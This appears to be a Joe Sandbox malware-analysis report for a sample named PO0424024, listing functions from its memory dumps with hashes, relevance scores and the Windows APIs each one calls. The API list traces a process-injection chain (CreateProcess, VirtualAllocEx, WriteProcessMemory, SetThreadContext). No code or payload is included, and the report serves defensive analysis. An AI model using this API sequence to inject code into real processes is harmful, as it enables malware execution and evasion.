Instruction ID: 69d7f1dd44cb3ce3d7d7411412e8db4a132d57aba9cbbc5de37011572555d938
Opcode Fuzzy Hash: d9f610dad6569a65ddb686f22e008ac9f35b62e72e4b1c0a3f236e2df0cdbb13
Instruction Fuzzy Hash: 018114B4E55219DFCB04CFA9D980AEEFBB1FB8A300F00955AD411B72A4D7789912CF94

Uniqueness

Uniqueness Score: -1.00%

Function 071001A0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf60da56f74c87ae712febc3e5f79a244d1a9a62be9f7adbdcaf598db07311e8
Instruction ID: cc1e7a25945e00f9e5f0f407657e9c3763b1fb706e07c6e71ba3bbd503348ffd
Opcode Fuzzy Hash: bf60da56f74c87ae712febc3e5f79a244d1a9a62be9f7adbdcaf598db07311e8
Instruction Fuzzy Hash: 4F8112B4E15219DFCB04CFA9D980AEEFBB1FB8A300F10955AD411B72A4D7789912CF94

Uniqueness

Uniqueness Score: -1.00%

Function 07101BFD Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b54dde90619ea75451718a5de692161c19564947b3c809e6b2b8192314e3aefd
Instruction ID: 2f1a1c1ccf9cd617e3a1b32c1ec6b3db0800f3479062a292ee8f17d8db4ebca6
Opcode Fuzzy Hash: b54dde90619ea75451718a5de692161c19564947b3c809e6b2b8192314e3aefd
Instruction Fuzzy Hash: 9141BAB4D0120C9FDB10DFA9D984ADEFBF1AB09310F20942AE419BB291D7B59945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 07101C08 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8462e61fba4704b01ad3e2ff6fb5dcc9b93e934417aa2b6f0267da37623d86
Instruction ID: 195d8244fe421c0423702b9de76fae788fd171ff90fffe634f07d6e47fde0e40
Opcode Fuzzy Hash: 4f8462e61fba4704b01ad3e2ff6fb5dcc9b93e934417aa2b6f0267da37623d86
Instruction Fuzzy Hash: C2419AB4D0120C9FDB14DFA9D584A9EFBF1BB09310F20942AE419BB290D7B5A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 07102495 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f7b48901f18227fa012cb95d020bb73d9b1692813c749457422b806f3a2785
Instruction ID: 50e81369464a48454aedbd5079e9ec25fab15d5bc0ad7496fac395b338ddc4b4
Opcode Fuzzy Hash: 30f7b48901f18227fa012cb95d020bb73d9b1692813c749457422b806f3a2785
Instruction Fuzzy Hash: E221A3B4D04209EFDB15CFAAD4586EDBBF1BB49310F10E12AE824B7294D7748541CF98

Uniqueness

Uniqueness Score: -1.00%

Function 07107C09 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7438a7237a8846b20d014f2dc6f7e2fefcb90fb8e2e52858c0c83468c507a6
Instruction ID: 07766a81ef32d51a1a9d691eac87820bfe5a063323eca503ab89069310059629
Opcode Fuzzy Hash: 6e7438a7237a8846b20d014f2dc6f7e2fefcb90fb8e2e52858c0c83468c507a6
Instruction Fuzzy Hash: 2F21E4B0D146189BEB18CFA7D8447EEFBF6AFC9310F14C02AD409762A4DBB519468F90

Uniqueness

Uniqueness Score: -1.00%

Function 07107C10 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e54d42cd3e16ba1281b928145d37aa7f96fa8896ead0a69f20cb1a696584707
Instruction ID: c7d24dd45722b067be944472afff02551f8266eee3bcdf8e3ae912d71432e2c5
Opcode Fuzzy Hash: 2e54d42cd3e16ba1281b928145d37aa7f96fa8896ead0a69f20cb1a696584707
Instruction Fuzzy Hash: 8B21E5B0D146188BEB18CF97D8447EEFBFAAFC9310F14C029D40976294DBB519458F90

Uniqueness

Uniqueness Score: -1.00%

Function 071024A0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce074cccd92eff306bff029fad1acfb225c74be1caa8f349f23b81eb81411ee0
Instruction ID: 083b5e2b3d76bf4fbb2866084f1b0924eee6a8290c131289703c0a1961ae9a7e
Opcode Fuzzy Hash: ce074cccd92eff306bff029fad1acfb225c74be1caa8f349f23b81eb81411ee0
Instruction Fuzzy Hash: 28219FB4D04209DFDB15CFAAD4486EEBBF1BB49310F20E129E824B7290D7749941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 04D92868 Relevance: 2.6, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 04D92930
Hbq, xrefs: 04D92996

Memory Dump Source

Source File: 00000000.00000002.1732969193.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d90000_PO0424024.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 2de4806a49bcf76dc5fcfaf2eacf232751c41c55f0039292fa914f98a2fd13ba
Instruction ID: a02d4351aab29d8f6dd8b674364a17bd3fba14e2fe25b84a9551b9548d0cc542
Opcode Fuzzy Hash: 2de4806a49bcf76dc5fcfaf2eacf232751c41c55f0039292fa914f98a2fd13ba
Instruction Fuzzy Hash: 7141C275B002559FDF45EBB884646AE7AF7BFC9300B14446AD106E7391EF389E02C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0710DB6C Relevance: 1.8, APIs: 1, Instructions: 325
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0710DE3F

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a487bcfe7612d49126b2466825fd9e0a90dfd76c74cc849239f53d23534fec07
Instruction ID: dae8d44a26a5070f48e3251c32ac8729e70549302de61d28e8be22a3fb3c5194
Opcode Fuzzy Hash: a487bcfe7612d49126b2466825fd9e0a90dfd76c74cc849239f53d23534fec07
Instruction Fuzzy Hash: 34C139B0D0021A8FDB25DFA8D8417EDBBB1BF49304F0095A9D849B7284DBB49A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0710DB78 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0710DE3F

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6c1a8da512c0d80608d2dcff2b41e8a78e29c5d4dbff78d23573bcd71dea462a
Instruction ID: 84aacf200fb2650abfaf83b1ce6a68d76a312fe2212965288884093ea2d49d42
Opcode Fuzzy Hash: 6c1a8da512c0d80608d2dcff2b41e8a78e29c5d4dbff78d23573bcd71dea462a
Instruction Fuzzy Hash: 7BC138B0D0021E8FDB25CFA8D8417EDBBB1BF49304F0095A9D849B7284DBB49A85CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0257AFA3 Relevance: 1.7, APIs: 1, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(?), ref: 0257B22A

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ac93302ca44f257f8d3749f4388fec8f1935c7b2944ff8a6c0afa380c04fc3ce
Instruction ID: e609ff31a0b475437eb5f534420f721e2e66861ba7a3b2d2486ce0295ce0cb1e
Opcode Fuzzy Hash: ac93302ca44f257f8d3749f4388fec8f1935c7b2944ff8a6c0afa380c04fc3ce
Instruction Fuzzy Hash: C091F2B4A00B098FDB24DF69E4547AABBF2FF88304F008929E45AA7650D735A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04CC1E7B Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1732891577.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cc0000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff606a8b0c33f8b29e0e8113437c2d3e22af3777796fc849321ead1cd93666b3
Instruction ID: d8f046628fdcfbbc81e315d7fcd8a4939b05da09736e21c32ea4e06b07e68543
Opcode Fuzzy Hash: ff606a8b0c33f8b29e0e8113437c2d3e22af3777796fc849321ead1cd93666b3
Instruction Fuzzy Hash: 1181BEB5D00218DFDF11CFA9D980ADDBBF2BF09304F1491AAE908A7221D731AA85DF05

Uniqueness

Uniqueness Score: -1.00%

Function 04CC1ED0 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04CC2091

Memory Dump Source

Source File: 00000000.00000002.1732891577.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cc0000_PO0424024.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d5c641558de5e7c332e52f9c06d422ae9c47305de4c1978ee3b9b38a68fa8b40
Instruction ID: 0f81082c152e50ee9689eb7d0b7d8e5c83d009c84585e0d868cdf405cd87ba76
Opcode Fuzzy Hash: d5c641558de5e7c332e52f9c06d422ae9c47305de4c1978ee3b9b38a68fa8b40
Instruction Fuzzy Hash: 867189B4D00218DFDF20CFA9D984BDEBBF1BB09300F5491AAE808A7211D771AA85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02573E44 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02575F59

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f42e216836270020e34a0d0718cbbb560a009c9f57c0dc3832b16bff6ef16efe
Instruction ID: 7d4ec0b7bc41de441890972c8a5d9a6a9519546499aaf792da0483ffd1b2855d
Opcode Fuzzy Hash: f42e216836270020e34a0d0718cbbb560a009c9f57c0dc3832b16bff6ef16efe
Instruction Fuzzy Hash: 8A51B2B1D00219CFDB20DFA8C944B9EBBF5BF49304F1084AAD509BB251DB716A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02575E22 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02575F59

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 34c59dcf4941d8a8319656c350d2ea342e906f1856cf0d2f4d6bc2add54cf174
Instruction ID: 19a5c72a5920bf8b7b43111b7881a445ff0f03345a7a05f63920862ab725c680
Opcode Fuzzy Hash: 34c59dcf4941d8a8319656c350d2ea342e906f1856cf0d2f4d6bc2add54cf174
Instruction Fuzzy Hash: D651D5B0D04219CFDB21DFA8C884BDEBBF5BF46304F10849AD549AB211EB716A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02575E63 Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02575F59

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 85dd6d856adc482aae526ff2aee790dbc0b2b66f26ca186e4048b41eeff199ca
Instruction ID: 505139081705180ba718150ab862e33158085e437ea814a976b0645c07b1b31f
Opcode Fuzzy Hash: 85dd6d856adc482aae526ff2aee790dbc0b2b66f26ca186e4048b41eeff199ca
Instruction Fuzzy Hash: 6751B0B1D00219CFDB20DFA8C940B9EBBF5BF49304F1084AAD509BB251DB716A89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0710D7E9 Relevance: 1.6, APIs: 1, Instructions: 121
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0710D8C3

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8deadbcc6130ca81c1b07c3fd2d9473f1f2cb7748fb700aa42a9d0fada90989d
Instruction ID: ea42c5569b4096ac2cb1e9c4440affb8340a116d4ac9e9e746a8f280f0383b67
Opcode Fuzzy Hash: 8deadbcc6130ca81c1b07c3fd2d9473f1f2cb7748fb700aa42a9d0fada90989d
Instruction Fuzzy Hash: 3B41ABB5D012589FCF00CFA9D984AEEFBF1BB49310F20942AE858B7240D775AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0710D7F0 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0710D8C3

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 751b4b39f97f48b40b50cd0098253895e37afb9fe5b930fcc90f4fb27a273279
Instruction ID: 9bb913e45396b5774f80072ea68d6e4232b43b43f259307657c71fbfcff1dc19
Opcode Fuzzy Hash: 751b4b39f97f48b40b50cd0098253895e37afb9fe5b930fcc90f4fb27a273279
Instruction Fuzzy Hash: C24199B4D012589FCF00CFA9D984ADEFBF1BB49310F20942AE819B7250D775AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0257B638 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0257D7A3

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d4fa6755a706626f3b46b4ef84c08bc873f472f6c285de48dfc0b6b001c85500
Instruction ID: 092c20e8064370ffe248504eba5a23613b2c2a1eb94f47c3ec9d6244d79d39d3
Opcode Fuzzy Hash: d4fa6755a706626f3b46b4ef84c08bc873f472f6c285de48dfc0b6b001c85500
Instruction Fuzzy Hash: 724175B9D012589FCB00CFA9E984ADEBBF5BF49310F14906AE918BB311D335A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0710D940 Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0710D9FA

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e0b78e2aa3edd7aa6ffd005f000045ba81054e07a11044fa9a30c1d1f3bff8e9
Instruction ID: a5cde2d7dbb74edb484800bc21a529b0f717644fee3ded059dc14525e32bd67f
Opcode Fuzzy Hash: e0b78e2aa3edd7aa6ffd005f000045ba81054e07a11044fa9a30c1d1f3bff8e9
Instruction Fuzzy Hash: 4A41BCB4D04258DFCF10CFAAE984AEEFBB1BB49310F10942AE855B7240C775A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0257D6D3 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0257D7A3

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0dc47f2157872a77bde5f1bbb28a5d6cee576cf7d227efe18d9ac540bdc460b5
Instruction ID: e5b714affbc3f88b5dc938d00064a9998fbc8b85ef9482b88b39fbd6777da9fb
Opcode Fuzzy Hash: 0dc47f2157872a77bde5f1bbb28a5d6cee576cf7d227efe18d9ac540bdc460b5
Instruction Fuzzy Hash: A34165B9D012589FCB00CFA9D984ADEBBF1BB09310F24906AE918AB311D735AA55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0710D6C8 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0710D77A

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d4eb4cdd5c07f310e7cac12dc54ea3d57a97463cd6bf9783ffc18864ac358ad
Instruction ID: b128d03db761bd1b636c00714de6de1f23c59313b4041e766d219eab19f5eb40
Opcode Fuzzy Hash: 5d4eb4cdd5c07f310e7cac12dc54ea3d57a97463cd6bf9783ffc18864ac358ad
Instruction Fuzzy Hash: B031BCB8D002589FCF00CFA9E884ADEFBB1FB49310F10942AE815B7250C775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0710D948 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0710D9FA

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e71a53250da3919f953cc0a7b85beda4cdb87abf8d76d708fba46b9854b99879
Instruction ID: b016810b11616bc7b5a6b4af42556b87652271c9d9414f5d912b14cb6da725c1
Opcode Fuzzy Hash: e71a53250da3919f953cc0a7b85beda4cdb87abf8d76d708fba46b9854b99879
Instruction Fuzzy Hash: 4B41A9B4D04258DFCF10CFAAD884AEEFBB1BB49310F10942AE819B7240C775A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0710D6D0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0710D77A

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6beb96e044e603789748cd4d8c8feb2d6906db0fb5c4ffd7fc95ff062f20af9c
Instruction ID: 2393f33c14a448bedcb7aefeb2453bd5f3716e0649f7005b9a14a11a595538a8
Opcode Fuzzy Hash: 6beb96e044e603789748cd4d8c8feb2d6906db0fb5c4ffd7fc95ff062f20af9c
Instruction Fuzzy Hash: 4A3188B9D002589FCF10CFA9E984ADEFBB1FB49310F10A42AE819B7250D775A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0710D5A0 Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0710D657

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f1d1c56fce04ad9cf5089bb813dba4455bd51c2f915253653b087171edbd0d9c
Instruction ID: 73452e74364aceb83a7535e8bc4ba7b9d312e56fe022bc4bd454f1f89fe12f06
Opcode Fuzzy Hash: f1d1c56fce04ad9cf5089bb813dba4455bd51c2f915253653b087171edbd0d9c
Instruction Fuzzy Hash: 4B41CEB5D012189FCB10DFAAD884AEEFBF1BB49310F14802AE459B7280C774A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0257A390 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0257B952

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 280f61faf0c06af8b95ff17e32def92d76a85e29ba0a793f52e7a5fd1ba3b055
Instruction ID: f42725de971ba34c5ddda8ca9d061825ac8aba3b32d05fac9f13da8dce509657
Opcode Fuzzy Hash: 280f61faf0c06af8b95ff17e32def92d76a85e29ba0a793f52e7a5fd1ba3b055
Instruction Fuzzy Hash: 644177B4D002589FCB10CFAAE584A9EFBF1FB49314F14946AE928B7320D375A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0710D5A8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0710D657

Memory Dump Source

Source File: 00000000.00000002.1736606355.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7100000_PO0424024.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 66584845cb14c9d6ae583729bf227551679942086b23696bc99a9ac08353071f
Instruction ID: 2a5e3862d54c5bfa844350416d9666fd1058bbdc381839ca45b7483f447bd418
Opcode Fuzzy Hash: 66584845cb14c9d6ae583729bf227551679942086b23696bc99a9ac08353071f
Instruction Fuzzy Hash: 0431BEB4D012589FCB14DFAAD884ADEFBF1BF49310F14842AE419B7240D778A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04CC4640 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04CC4701

Memory Dump Source

Source File: 00000000.00000002.1732891577.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cc0000_PO0424024.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5dc62aba08ae68e51e4b61c04b9a059cdc05a6f7576e1c6fd0c331a7307f7d3b
Instruction ID: 521c289f0f634e7ce2dbd8d30dae3ddf79653e8e4424e1f8a0b554ed90dbb420
Opcode Fuzzy Hash: 5dc62aba08ae68e51e4b61c04b9a059cdc05a6f7576e1c6fd0c331a7307f7d3b
Instruction Fuzzy Hash: 204147B8900309DFDB14CF99C448AAABBF6FB88314F24C45DE519AB321D774A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0257B8A1 Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0257B952

Memory Dump Source

Source File: 00000000.00000002.1727956560.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2570000_PO0424024.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 849dc5a39eb4e9461fdf765391c9fad14f0ba8fe3489b7b02e66e6e501ab1aff
Instruction ID: bf3888da37fffe9eab6e2f1f8c4736b4f91690f82c9e4c9ca73170a5ad4df488
Opcode Fuzzy Hash: 849dc5a39eb4e9461fdf765391c9fad14f0ba8fe3489b7b02e66e6e501ab1aff
Instruction Fuzzy Hash: 854197B8D00248DFCB14CFA9E484A9EFBF1BB08314F14946AE968B7320D335A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 071F012A Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 071F01CB

Memory Dump Source

Source File: 00000000.00000002.1736899059.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71f0000_PO0424024.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fe827f986aef984c44a7e0df5984955cf1399679d9d3d5da0e7c854ed1a58c39
Instruction ID: f4d48dd891bd19d0892a302f9f04f10f98c1d1e7c06c07a43e77e51849f503c0
Opcode Fuzzy Hash: fe827f986aef984c44a7e0df5984955cf1399679d9d3d5da0e7c854ed1a58c39
Instruction Fuzzy Hash: 3531A8B8D05218AFCB10CF99E984ADEFBF4EB09310F10901AE818B7310D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 071F0130 Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 071F01CB

Memory Dump Source

Source File: 00000000.00000002.1736899059.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_71f0000_PO0424024.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9f2309d85d663ea74de9dcf41711bf6974d2174cf0527fdd45c0ba2d42b25653
Instruction ID: 2bc0ec6b41ddd2b31a0abbfbd399e9c5c36f843cee29c6534feac42cd30a4b5f
Opcode Fuzzy Hash: 9f2309d85d663ea74de9dcf41711bf6974d2174cf0527fdd45c0ba2d42b25653
